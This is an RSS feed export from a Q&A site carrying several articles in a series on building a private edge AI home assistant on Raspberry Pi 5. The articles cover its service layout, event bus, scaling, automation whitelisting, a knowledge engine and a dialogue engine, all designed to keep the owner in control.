<?xml version="1.0" encoding="utf-8" standalone="no"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0">
<channel>
<title>Asky Q&amp;A - Recent questions</title>
<link>https://asky.uk/questions</link>
<description>Powered by Question2Answer</description>
<language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>Powered by Question2Answer</itunes:subtitle><item>
<title>Implementation Blueprint: From Architecture to a Running MVP on Raspberry Pi 5 A Service-Oriented Layout That Avoids “Script Spaghetti”</title>
<link>https://asky.uk/123/implementation-blueprint-architecture-raspberry-spaghetti</link>
<description>&lt;p&gt;Implementation Blueprint: From Architecture to a Running MVP on Raspberry Pi 5&lt;br&gt;A Service-Oriented Layout That Avoids “Script Spaghetti”&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The fastest way to kill an Edge AI project is to grow it as a pile of scripts. It starts as “just one Python file,” and ends as an unmaintainable system where changing one module breaks three others. This article provides a concrete implementation blueprint: directory structure, service layout, process separation, a minimal working MVP, and a clean path to run everything as Linux services on Raspberry Pi 5.&lt;br&gt;&lt;br&gt;Goals of the Blueprint&lt;br&gt;This layout optimizes for:&lt;br&gt;– clarity of responsibilities (one service = one job)&lt;br&gt;– stable interfaces between components&lt;br&gt;– deterministic startup and restart behavior&lt;br&gt;– debuggability via structured logs&lt;br&gt;– incremental expansion without rewrites&lt;br&gt;&lt;br&gt;Process Separation: What Runs Where&lt;br&gt;We separate the system into processes so that failures and resource spikes do not cascade:&lt;br&gt;1) vision_service: camera capture + face detection + embeddings + candidate identity&lt;br&gt;2) identity_service: enrollment DB + matching + confidence gating + identity state&lt;br&gt;3) scenario_service: event bus consumer + deterministic scenario selection + action requests&lt;br&gt;4) dialogue_service: STT/intent + response generation (local or API) + TTS requests&lt;br&gt;5) knowledge_service: RSS fetch + extraction + ranking + summarization + structured results&lt;br&gt;6) automation_service: email/alerts/calls/webhooks with strict whitelisting&lt;br&gt;7) api_gateway (optional MVP+): local HTTP API for admin + health checks&lt;br&gt;MVP uses only: vision_service + identity_service + scenario_service + (optional TTS stub).&lt;br&gt;&lt;br&gt;Directory Structure (Concrete)&lt;br&gt;Use a single repo with clear boundaries:&lt;br&gt;repo/&lt;br&gt;&amp;nbsp; README.md&lt;br&gt;&amp;nbsp; pyproject.toml&lt;br&gt;&amp;nbsp; .env.example&lt;br&gt;&amp;nbsp; configs/&lt;br&gt;&amp;nbsp; &amp;nbsp; app.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; topics.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; scenarios.yaml&lt;br&gt;&amp;nbsp; &amp;nbsp; identities.yaml&lt;br&gt;&amp;nbsp; data/&lt;br&gt;&amp;nbsp; &amp;nbsp; embeddings/&lt;br&gt;&amp;nbsp; &amp;nbsp; identities.db&lt;br&gt;&amp;nbsp; &amp;nbsp; cache/&lt;br&gt;&amp;nbsp; &amp;nbsp; logs/&lt;br&gt;&amp;nbsp; services/&lt;br&gt;&amp;nbsp; &amp;nbsp; vision_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; camera.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; detect.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; embed.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; identity_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; store.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; match.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; thresholds.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; scenario_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rules.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; actions.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; cooldowns.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; dialogue_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; stt.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; intent.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; llm.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; tts.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; knowledge_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rss.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; extract.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; rank.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; summarize.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; &amp;nbsp; automation_service/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; main.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; email.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; notify.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; calls.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; webhooks.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; policy.py&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; config.py&lt;br&gt;&amp;nbsp; shared/&lt;br&gt;&amp;nbsp; &amp;nbsp; __init__.py&lt;br&gt;&amp;nbsp; &amp;nbsp; events.py&lt;br&gt;&amp;nbsp; &amp;nbsp; bus.py&lt;br&gt;&amp;nbsp; &amp;nbsp; logging.py&lt;br&gt;&amp;nbsp; &amp;nbsp; schemas.py&lt;br&gt;&amp;nbsp; &amp;nbsp; security.py&lt;br&gt;&amp;nbsp; scripts/&lt;br&gt;&amp;nbsp; &amp;nbsp; enroll_identity.py&lt;br&gt;&amp;nbsp; &amp;nbsp; test_camera.py&lt;br&gt;&amp;nbsp; &amp;nbsp; inject_event.py&lt;br&gt;&amp;nbsp; deploy/&lt;br&gt;&amp;nbsp; &amp;nbsp; systemd/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; vision.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; identity.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; scenario.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; dialogue.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; knowledge.service&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; automation.service&lt;br&gt;&amp;nbsp; &amp;nbsp; nginx/&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; local.conf&lt;br&gt;&lt;br&gt;Rule #1: shared/ contains only “boring” cross-cutting utilities (events, logging, schemas). If shared grows into business logic, you are rebuilding a monolith.&lt;br&gt;&lt;br&gt;Interfaces: Event Bus First&lt;br&gt;To avoid tight coupling, services communicate through an event bus abstraction (can start simple):&lt;br&gt;– MVP option A: local file-backed queue (simple, reliable)&lt;br&gt;– MVP option B: Redis pub/sub (cleaner, still lightweight)&lt;br&gt;– MVP option C: MQTT (good if you later add microcontrollers)&lt;br&gt;In all cases, messages are structured events:&lt;br&gt;Event = {type, timestamp, source, payload, trace_id}&lt;br&gt;&lt;br&gt;Minimal Working MVP (Day-1 Target)&lt;br&gt;MVP behavior:&lt;br&gt;1) vision_service detects a face and produces embedding&lt;br&gt;2) identity_service matches embedding to known identities&lt;br&gt;3) scenario_service selects a greeting scenario&lt;br&gt;4) scenario_service triggers a “speak” action (initially a stub that prints)&lt;br&gt;That’s enough to validate the full architecture loop end-to-end.&lt;br&gt;&lt;br&gt;MVP Event Flow&lt;br&gt;vision_service emits:&lt;br&gt;– FaceSeen {embedding_id, quality, bbox, cam_id}&lt;br&gt;identity_service emits:&lt;br&gt;– IdentityResolved {identity: owner|guest|unknown, name?, confidence}&lt;br&gt;scenario_service emits:&lt;br&gt;– ActionRequested {action: speak, text, voice_profile}&lt;br&gt;(automation/dialogue/knowledge can be added later without redesign.)&lt;br&gt;&lt;br&gt;Configuration Strategy (No Hardcoding)&lt;br&gt;All behavior must live in configs/:&lt;br&gt;– thresholds (recognition confidence)&lt;br&gt;– identities (enrolled people)&lt;br&gt;– scenarios (rules + priorities + cooldowns)&lt;br&gt;– topics (for knowledge engine later)&lt;br&gt;The code reads configs at startup and supports reload by restart. Avoid hot-reload complexity early.&lt;br&gt;&lt;br&gt;Logging and Observability&lt;br&gt;Every service logs structured JSON lines:&lt;br&gt;– timestamp, service, level, event_type, trace_id, message&lt;br&gt;Store logs in data/logs/. Prefer rotation. A single “trace_id” per flow makes debugging easy across services.&lt;br&gt;&lt;br&gt;Running as Services (systemd)&lt;br&gt;systemd is the simplest reliable supervisor on Raspberry Pi OS.&lt;br&gt;Each service gets:&lt;br&gt;– its own user (optional but ideal)&lt;br&gt;– its own working directory&lt;br&gt;– restart on failure&lt;br&gt;– environment file for secrets&lt;br&gt;You avoid “run it in a terminal forever” operational fragility.&lt;br&gt;&lt;br&gt;Example systemd unit (Pattern)&lt;br&gt;deploy/systemd/vision.service should define:&lt;br&gt;– ExecStart: python -m services.vision_service.main&lt;br&gt;– WorkingDirectory: repo/&lt;br&gt;– Restart: on-failure&lt;br&gt;– EnvironmentFile: /etc/yourassistant/env&lt;br&gt;Repeat for identity/scenario. Start with 3 services only.&lt;br&gt;&lt;br&gt;Avoiding Script Spaghetti (Hard Rules)&lt;br&gt;1) No cross-imports between services (only shared/)&lt;br&gt;2) No hidden globals (use config objects)&lt;br&gt;3) No “just call that function” across boundaries—use events&lt;br&gt;4) One responsibility per service&lt;br&gt;5) Add features by adding modules, not by expanding main.py&lt;br&gt;If a file exceeds a few hundred lines, split it.&lt;br&gt;&lt;br&gt;Incremental Expansion Plan&lt;br&gt;After MVP:&lt;br&gt;Step 1: replace “speak stub” with a real TTS service call&lt;br&gt;Step 2: add dialogue_service for voice commands&lt;br&gt;Step 3: add knowledge_service for RSS digests&lt;br&gt;Step 4: add automation_service with strict whitelists&lt;br&gt;At every step, the event contracts remain stable.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;Next article: “MVP Build Guide: Installing Dependencies, Creating the Event Bus, and Running Vision→Identity→Scenario on Raspberry Pi 5.” This will include concrete commands, minimal code skeletons, and the first runnable demo.&lt;br&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize%3Afit%3A1400/1%2AvwlCwTK7Rp-S6RUZm3XaCQ.png" style="height:375px; width:487px"&gt;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/123/implementation-blueprint-architecture-raspberry-spaghetti</guid>
<pubDate>Sun, 15 Feb 2026 10:25:03 +0000</pubDate>
</item>
<item>
<title>Future Expansion: Scaling a Personal Edge AI System Growing Capability Without Losing Control</title>
<link>https://asky.uk/122/expansion-scaling-personal-growing-capability-without-control</link>
<description>&lt;p&gt;&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;A personal Edge AI assistant should not be a dead-end prototype. If designed correctly, it can scale in capability, coverage, and resilience without abandoning its core principles. This article outlines safe, incremental expansion paths that preserve ownership, privacy, and determinism while extending the system beyond a single device.&lt;br&gt;&lt;br&gt;Scaling Philosophy&lt;br&gt;Expansion must be additive, not transformative. New capabilities are introduced as optional modules or nodes, never by altering core trust boundaries. The original single-owner, edge-first model remains intact at all scales.&lt;br&gt;&lt;br&gt;Vertical Scaling&lt;br&gt;Vertical scaling improves what one device can do. Examples include:&lt;br&gt;– upgrading storage or cooling&lt;br&gt;– adding accelerators where available&lt;br&gt;– running additional local services&lt;br&gt;Vertical scaling is limited but simple. It preserves a single point of control and minimal network complexity.&lt;br&gt;&lt;br&gt;Horizontal Scaling&lt;br&gt;Horizontal scaling introduces additional edge nodes. These may include:&lt;br&gt;– secondary Raspberry Pi units in other rooms&lt;br&gt;– microcontrollers handling sensors or actuators&lt;br&gt;– dedicated vision or audio nodes&lt;br&gt;Each node performs narrow tasks and reports events upstream. Intelligence remains centralized or explicitly federated.&lt;br&gt;&lt;br&gt;Edge Node Roles&lt;br&gt;Expanded systems benefit from role separation:&lt;br&gt;– Perception nodes (cameras, microphones)&lt;br&gt;– Knowledge nodes (retrieval, summarization)&lt;br&gt;– Automation nodes (actuators, services)&lt;br&gt;Nodes communicate through authenticated, minimal protocols. No node shares raw data unnecessarily.&lt;br&gt;&lt;br&gt;Federated Identity Model&lt;br&gt;Identity remains owner-centric across nodes. Recognition may occur locally, but identity resolution rules are shared from the primary node. No node independently enrolls identities or modifies scenarios. Federation does not imply autonomy.&lt;br&gt;&lt;br&gt;Distributed Scenarios&lt;br&gt;Scenarios may trigger actions on remote nodes but are still defined centrally. Remote execution is treated as a delegated action with strict permissions and timeouts. Loss of connectivity results in graceful degradation, not autonomous behavior.&lt;br&gt;&lt;br&gt;Resilience and Fault Isolation&lt;br&gt;Multiple nodes increase resilience if designed correctly. Failure of one node must not cascade. Each node should fail silently or report errors without blocking the system. Redundancy is preferred over complexity.&lt;br&gt;&lt;br&gt;Local Models and On-Device Intelligence&lt;br&gt;Future expansion may include local language or vision models running entirely offline. Quantized or specialized models can replace external APIs selectively. The system should allow coexistence of multiple inference backends.&lt;br&gt;&lt;br&gt;Energy and Sustainability&lt;br&gt;As systems grow, energy use matters. Nodes should idle efficiently and wake only on relevant events. Low-power devices handle continuous sensing; higher-power nodes activate on demand.&lt;br&gt;&lt;br&gt;Maintenance and Upgrades&lt;br&gt;Expansion increases maintenance cost. Clear versioning, configuration management, and documentation are essential. Every node must be recoverable independently. Backups and restore procedures should be tested regularly.&lt;br&gt;&lt;br&gt;Avoiding the “Smart Home Trap”&lt;br&gt;Scaling should not turn the assistant into a generic smart home controller. The assistant remains identity- and context-driven, not rule-spaghetti automation. If expansion adds complexity without clarity, it is a regression.&lt;br&gt;&lt;br&gt;Long-Term Vision&lt;br&gt;At full maturity, the system becomes a personal edge ecosystem: multiple nodes, unified identity, controlled intelligence, and predictable behavior. Crucially, it remains understandable by its owner.&lt;br&gt;&lt;br&gt;Series Conclusion&lt;br&gt;This series demonstrated how to design a personal Edge AI assistant from first principles: perception without surveillance, identity without profiling, conversation without autonomy, automation without loss of control, and expansion without compromise. The result is not a product but a framework—one that any motivated enthusiast can build, inspect, and evolve at home.&lt;br&gt;&lt;img alt="" src="https://www.couchbase.com/blog/wp-content/uploads/sites/1/2024/07/Couchbase-Mobile-Overview-1.png" style="height:245px; width:465px"&gt;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/122/expansion-scaling-personal-growing-capability-without-control</guid>
<pubDate>Mon, 26 Jan 2026 22:09:21 +0000</pubDate>
</item>
<item>
<title>Security, Auditing, and Ethics by Design Building a Trustworthy Personal Edge AI System</title>
<link>https://asky.uk/121/security-auditing-ethics-design-building-trustworthy-personal</link>
<description>&lt;p&gt;Security, Auditing, and Ethics by Design&lt;br&gt;Building a Trustworthy Personal Edge AI System&lt;br&gt;&lt;img alt="" src="https://www.researchgate.net/publication/364586435/figure/fig1/AS%3A11431281222177380%401707141527854/The-Life-cycle-framework-for-the-AI-algorithm-audit.jpg" style="height:688px; width:692px"&gt;&lt;br&gt;Introduction&lt;br&gt;Security and ethics are not optional layers added at the end of development. In a personal Edge AI assistant, they define whether the system deserves trust at all. This article describes how security, auditing, and ethical constraints are embedded directly into the architecture, ensuring predict&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/121/security-auditing-ethics-design-building-trustworthy-personal</guid>
<pubDate>Thu, 22 Jan 2026 21:37:37 +0000</pubDate>
</item>
<item>
<title>Automation &amp; Services Engine: Email, Calls, and Alerts Integrating Real-World Actions Without Losing Control</title>
<link>https://asky.uk/120/automation-services-integrating-actions-without-control</link>
<description>&lt;p&gt;Automation &amp;amp; Services Engine: Email, Calls, and Alerts&lt;br&gt;Integrating Real-World Actions Without Losing Control&lt;br&gt;&lt;img alt="" src="https://media.springernature.com/lw685/springer-static/image/art%3A10.1038%2Fs41598-025-13465-7/MediaObjects/41598_2025_13465_Fig2_HTML.png" style="height:749px; width:583px"&gt;&lt;br&gt;Introduction&lt;br&gt;The Automation &amp;amp; Services Engine bridges the assistant with the external world. It executes real actions—sending emails, issuing alerts, initiating calls—based on explicit scenarios. This engine must be powerful yet tightly constrained, ensuring that convenience never overrides safety or ownership.&lt;br&gt;&lt;br&gt;Design Philosophy&lt;br&gt;Automation is permissioned execution, not autonomous behavior. Every action must be explicitly defined, auditable, and reversible. The engine does not decide what to automate; it only executes what the Scenario Engine authorizes.&lt;br&gt;&lt;br&gt;Core Capabilities&lt;br&gt;Typical capabilities include:&lt;br&gt;– sending and reading email summaries&lt;br&gt;– pushing notifications&lt;br&gt;– initiating calls to predefined contacts or services&lt;br&gt;– triggering webhooks or local integrations&lt;br&gt;– executing emergency workflows&lt;br&gt;No capability exists unless explicitly enabled by the owner.&lt;br&gt;&lt;br&gt;Action Whitelisting&lt;br&gt;All actions are whitelisted. Each action definition specifies:&lt;br&gt;– allowed triggers&lt;br&gt;– allowed recipients or endpoints&lt;br&gt;– rate limits&lt;br&gt;– failure behavior&lt;br&gt;Actions outside the whitelist are impossible to execute.&lt;br&gt;&lt;br&gt;Email Handling&lt;br&gt;Email integration is read-first by default. The engine retrieves headers and summaries, not full bodies, unless allowed. Sending emails is restricted to predefined contacts and templates. Credentials are stored locally and scoped to minimal permissions.&lt;br&gt;&lt;br&gt;Calls and Voice Notifications&lt;br&gt;Calls are high-impact actions and require strict controls. Only predefined numbers (family, emergency services, trusted contacts) are callable. Calls are initiated only by owner-approved scenarios. Voice notifications follow scripted prompts to avoid ambiguity.&lt;br&gt;&lt;br&gt;Emergency Workflows&lt;br&gt;Emergency scenarios are explicit and rare. Examples include medical alerts or safety notifications. Such workflows bypass non-critical scenarios but never bypass identity validation. Emergency actions are logged with maximum detail.&lt;br&gt;&lt;br&gt;Rate Limiting and Cooldowns&lt;br&gt;To prevent abuse or runaway loops, all actions enforce cooldowns and rate limits. Even valid scenarios cannot trigger actions repeatedly beyond defined thresholds.&lt;br&gt;&lt;br&gt;Failure and Retry Policy&lt;br&gt;Failures are handled conservatively. Actions may retry only if explicitly configured. Silent retries are forbidden. The system prefers partial failure with notification over uncontrolled repetition.&lt;br&gt;&lt;br&gt;Security Boundaries&lt;br&gt;The Automation Engine enforces:&lt;br&gt;– no dynamic endpoint creation&lt;br&gt;– no arbitrary command execution&lt;br&gt;– no credential exposure to other engines&lt;br&gt;– no direct access from Dialogue Engine&lt;br&gt;All automation flows originate from validated scenarios only.&lt;br&gt;&lt;br&gt;Testing and Dry-Run Mode&lt;br&gt;Every action supports a dry-run mode. In this mode, actions are logged but not executed. This enables safe testing and validation before enabling live automation.&lt;br&gt;&lt;br&gt;Observability&lt;br&gt;All actions generate structured logs including timestamp, scenario ID, action type, and outcome. Logs are local, append-only, and reviewable by the owner.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Automation Engine receives bounded instructions from the Scenario Engine and returns success or failure states. It cannot influence identity, dialogue, or scenario logic.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With automation in place, the next article focuses on System Security, Auditing, and Ethics: ensuring long-term trust, maintainability, and responsible operation of a personal Edge AI assistant.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/120/automation-services-integrating-actions-without-control</guid>
<pubDate>Thu, 22 Jan 2026 21:23:20 +0000</pubDate>
</item>
<item>
<title>Information &amp; Knowledge Engine: News, Topics, and Personalization</title>
<link>https://asky.uk/119/information-knowledge-engine-news-topics-personalization</link>
<description>&lt;p&gt;Information &amp;amp; Knowledge Engine: News, Topics, and Personalization&lt;br&gt;Turning Data Streams into Owner-Relevant Insight&lt;br&gt;&lt;img alt="" src="https://www.sphereinc.com/wp-content/uploads/2025/05/Edge_AI_computing_How_It_Works.png" style="height:338px; width:508px"&gt;&lt;br&gt;Introduction&lt;br&gt;The Information &amp;amp; Knowledge Engine transforms raw information sources into concise, relevant insight for the owner. Its goal is not infinite search or autonomous discovery, but controlled retrieval, filtering, and summarization aligned with explicitly defined interests. This engine answers a practical question: what information is worth interrupting the owner for?&lt;br&gt;&lt;br&gt;Design Principles&lt;br&gt;The engine follows strict principles:&lt;br&gt;– owner-centric relevance&lt;br&gt;– explicit topic boundaries&lt;br&gt;– deterministic filtering&lt;br&gt;– minimal data retention&lt;br&gt;– no behavioral profiling&lt;br&gt;Information is pulled on demand or on schedule, processed locally, and presented in a compact form.&lt;br&gt;&lt;br&gt;Information Sources&lt;br&gt;Typical sources include:&lt;br&gt;– RSS feeds (news, science, technology)&lt;br&gt;– curated websites&lt;br&gt;– documentation and reference material&lt;br&gt;– optional search APIs&lt;br&gt;All sources are explicitly configured by the owner. There is no automatic source discovery.&lt;br&gt;&lt;br&gt;Topic Model&lt;br&gt;Topics define what the assistant cares about. Each topic is a static definition including:&lt;br&gt;– keywords and phrases&lt;br&gt;– trusted sources&lt;br&gt;– update frequency&lt;br&gt;– summarization depth&lt;br&gt;Examples: “Raspberry Pi”, “Edge AI”, “Space exploration”, “Medical research”. Topics do not evolve automatically.&lt;br&gt;&lt;br&gt;Retrieval Pipeline&lt;br&gt;The retrieval process is linear and auditable:&lt;br&gt;Source Fetch → Content Extraction → Topic Matching → Ranking → Summarization → Delivery&lt;br&gt;Each step produces intermediate results that can be logged or inspected during debugging.&lt;br&gt;&lt;br&gt;Filtering and Ranking&lt;br&gt;Filtering removes irrelevant or low-quality content early. Ranking prioritizes items based on:&lt;br&gt;– topic relevance&lt;br&gt;– source trust level&lt;br&gt;– recency&lt;br&gt;– owner-defined importance&lt;br&gt;No engagement-based or popularity-based ranking is used.&lt;br&gt;&lt;br&gt;Summarization Strategy&lt;br&gt;Summarization is concise and purpose-driven. The engine produces:&lt;br&gt;– headline&lt;br&gt;– short abstract&lt;br&gt;– optional bullet highlights&lt;br&gt;Summaries are generated locally when possible or via external APIs if explicitly allowed. Raw articles are not stored long-term.&lt;br&gt;&lt;br&gt;Personalization Without Profiling&lt;br&gt;Personalization is declarative, not inferred. The owner defines interests, preferred depth, and delivery times. The system does not learn interests implicitly from reading behavior. This avoids hidden profiling and maintains predictability.&lt;br&gt;&lt;br&gt;Delivery Modes&lt;br&gt;Information can be delivered via:&lt;br&gt;– spoken briefings&lt;br&gt;– on-demand queries&lt;br&gt;– scheduled digests&lt;br&gt;– silent notifications&lt;br&gt;Delivery mode is bound to scenarios and identity context. Owner presence overrides all other delivery rules.&lt;br&gt;&lt;br&gt;Freshness and Caching&lt;br&gt;To balance freshness and efficiency, content is cached briefly. Cache lifetimes are topic-specific and conservative. Expired data is discarded automatically. There is no historical content archive unless explicitly enabled by the owner.&lt;br&gt;&lt;br&gt;Failure Handling&lt;br&gt;If a source is unavailable or parsing fails, the engine degrades gracefully. Partial results are acceptable; blocking the system is not. Errors are logged without triggering retries that could cause excessive network activity.&lt;br&gt;&lt;br&gt;Security and Privacy&lt;br&gt;External requests are minimized and transparent. No tracking parameters are added. The engine never transmits identity or conversational context to external sources. Network access is strictly scoped.&lt;br&gt;&lt;br&gt;Integration with Dialogue and Scenarios&lt;br&gt;The Knowledge Engine exposes structured results to the Dialogue Engine, which formats responses according to scenario constraints. The Knowledge Engine never speaks directly and never triggers actions on its own.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With information flow under control, the next article introduces the Automation &amp;amp; Services Engine: email handling, notifications, calls, and emergency workflows—integrated safely into a personal Edge AI system.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/119/information-knowledge-engine-news-topics-personalization</guid>
<pubDate>Mon, 19 Jan 2026 06:16:37 +0000</pubDate>
</item>
<item>
<title>Dialogue Engine: Controlled Conversation on the Edge</title>
<link>https://asky.uk/118/dialogue-engine-controlled-conversation-on-the-edge</link>
<description>&lt;p&gt;Dialogue Engine: Controlled Conversation on the Edge&lt;br&gt;Natural Interaction Without Loss of Control&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The Dialogue Engine enables natural language interaction while enforcing strict boundaries. Its purpose is not open-ended reasoning or autonomous planning, but reliable communication within predefined limits. A well-designed Dialogue Engine feels conversational yet remains predictable, auditable, and safe.&lt;br&gt;&lt;br&gt;Design Goals&lt;br&gt;The Dialogue Engine is built to achieve:&lt;br&gt;– natural speech interaction&lt;br&gt;– identity-aware responses&lt;br&gt;– deterministic control paths&lt;br&gt;– explicit scope limitation&lt;br&gt;– graceful degradation when uncertain&lt;br&gt;Conversation quality must never compromise system safety.&lt;br&gt;&lt;br&gt;Pipeline Overview&lt;br&gt;Dialogue processing follows a linear pipeline:&lt;br&gt;Audio Input → Speech-to-Text → Intent Extraction → Context Binding → Response Generation → Text-to-Speech&lt;br&gt;Each stage has clear inputs and outputs. No stage bypasses identity or scenario constraints.&lt;br&gt;&lt;br&gt;Speech-to-Text&lt;br&gt;Speech recognition converts audio into text with confidence scores. Local models are preferred for privacy and latency; cloud-based STT may be used selectively as a fallback. Low-confidence transcripts are discarded or clarified rather than acted upon.&lt;br&gt;&lt;br&gt;Intent Extraction&lt;br&gt;Intent extraction determines what the user wants, not how to execute it. Intents are categorized into a small, finite set:&lt;br&gt;– informational query&lt;br&gt;– command request&lt;br&gt;– conversational response&lt;br&gt;– system clarification&lt;br&gt;Free-form intent creation is explicitly forbidden.&lt;br&gt;&lt;img alt="" src="https://www.altexsoft.com/static/blog-post/2023/11/738ab7a9-2857-49e7-9eb4-03e366d89370.jpg" style="height:289px; width:515px"&gt;&lt;br&gt;Context Binding&lt;br&gt;Extracted intent is enriched with identity context from the Identity Engine and state context from the Scenario Engine. This step determines what information and actions are allowed. Context binding is where permissions are enforced, not later.&lt;br&gt;&lt;br&gt;Response Strategy&lt;br&gt;Responses follow a tiered strategy:&lt;br&gt;1) Local deterministic response (status, greetings)&lt;br&gt;2) Local knowledge retrieval (cached facts, summaries)&lt;br&gt;3) External API query (LLM or search), if explicitly allowed&lt;br&gt;The Dialogue Engine never decides which tier to use arbitrarily; the scenario defines allowed tiers.&lt;br&gt;&lt;br&gt;Use of Language Models&lt;br&gt;Language models are treated as external tools, not authorities. Prompts are structured, constrained, and identity-aware. Model output is post-processed and filtered before delivery. The assistant never exposes raw model output directly to the user.&lt;br&gt;&lt;br&gt;Conversation Memory&lt;br&gt;Conversation memory is short-lived and contextual. Long-term memory is not stored in the Dialogue Engine. Persistent preferences and interests belong to the Owner profile, not to conversational logs. This avoids unintended profiling.&lt;br&gt;&lt;br&gt;Clarification and Ambiguity&lt;br&gt;When intent confidence is low, the assistant asks clarifying questions or responds neutrally. Guessing is prohibited. A safe response is always preferred over a clever one.&lt;br&gt;&lt;br&gt;Voice Output&lt;br&gt;Text-to-Speech uses predefined voice profiles per scenario or identity. Voice output reflects role and context but does not adapt dynamically based on emotional inference. Consistency builds trust.&lt;br&gt;&lt;br&gt;Failure Modes&lt;br&gt;Common failures include background noise, overlapping speech, or ambiguous phrasing. The Dialogue Engine handles these by declining action, requesting repetition, or returning informational responses only. Failures never trigger automation.&lt;br&gt;&lt;br&gt;Security Constraints&lt;br&gt;The Dialogue Engine enforces:&lt;br&gt;– no execution of commands without scenario approval&lt;br&gt;– no prompt injection propagation&lt;br&gt;– no identity override via conversation&lt;br&gt;– no hidden system state disclosure&lt;br&gt;All responses are traceable to a scenario and intent.&lt;br&gt;&lt;br&gt;Testing and Validation&lt;br&gt;Dialogue behavior must be testable via text-only simulation. Audio is optional during development. Intent classification, context binding, and response filtering should be validated independently before full integration.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Dialogue Engine consumes identity and scenario context and produces bounded responses. It does not modify identity, scenarios, or automation rules. Control always returns to the Scenario Engine.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With controlled conversation in place, the next article introduces the Information and Knowledge Engine: news retrieval, topic filtering, summarization, and owner-personalized information flows.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
